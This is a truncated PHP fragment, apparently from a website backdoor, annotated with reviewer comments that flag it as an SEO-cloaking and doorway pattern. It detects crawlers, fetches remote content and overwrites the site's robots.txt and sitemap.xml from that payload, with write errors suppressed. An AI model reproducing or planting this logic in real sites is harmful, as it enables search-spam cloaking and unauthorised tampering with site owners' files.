// --- tail of the request-metadata array (the opening `array(`/earlier keys are above this chunk) ---
$http . $_SERVER["HTTP_HOST"], // full host URL; $http is presumably "http://" or "https://" — confirm upstream
    'req_uri' => $requri,
    'req_url' => $requrl,
    'req_ua' => $userAgent,
    'req_rf' => $referer );
// NOTE(review): branching on crawler detection and writing robots.txt/sitemap.xml from
// remotely-fetched content is a classic SEO-cloaking/doorway pattern — verify this code
// is legitimate before keeping it. isCrawler() and getContent() are helpers defined
// elsewhere in the project; their semantics are assumed from their names — TODO confirm.
if (isCrawler($userAgent) || substr($params['req_uri'], -6) === 'robots' || substr($params['req_uri'], -4) === '.xml') {
    $sRequri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';
    // Reject a robots request that arrived through a rewritten .html URL whose raw
    // REQUEST_URI differs from the computed $requri (i.e. request came via a sub-file path).
    if (in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && strpos($_SERVER['REQUEST_URI'], '.html') !== false && $sRequri !== $requri) {
        die('robots.txt and sitemap.xml file create fail by subfile!');
    }
    // Fetch the payload for this request — presumably remote content selected via $urlMap; confirm against the helper.
    $output = getContent($urlMap, $params);
    if (in_array(substr($params['req_uri'], -7), ['/robots', '?robots']) && !empty($output)) {
        // Payload is JSON; the visible reads imply: [0] => robots.txt body,
        // [1] => sitemap.xml body, [2] => truthy "subfile" flag.
        $output = json_decode($output, true);
        $subfile = (isset($output[2]) && !empty($output[2])) ? true : false;
        // 8 === FILE_APPEND: append to an existing robots.txt when the subfile flag is set,
        // otherwise overwrite. Write errors are deliberately suppressed (best-effort).
        $ret = @file_put_contents(__DIR__ . '/robots.txt', (isset($output[0]) && !empty($output[0])) ? $output[0] : '', $subfile ? 8 : 0);
        @file_put_contents(__DIR__ . '/sitemap.xml', (isset($output[1]) && !empty($output[1])) ? $output[1] : '');
        // Success criterion: the robots.txt write returned non-false AND the file now
        // contains a "sitemap" directive (case-insensitive substring check).
        $robots_cont = file_get_contents(__DIR__ . '/robots.txt');
        if ($ret !== false && strpos(strtolower($robots_cont), "sitemap") !== false) {
            die('robots.txt and sitemap.xml file create success!');
        } else {
            die('robots.txt and sitemap.xml file create fail!');
        }
    } elseif (!empty($output)) {
        // Non-robots crawler request with a payload. The string literal opened below is
        // truncated by this chunk boundary (likely a 5-byte prefix check on $output).
        if (substr($output, 0, 5) === '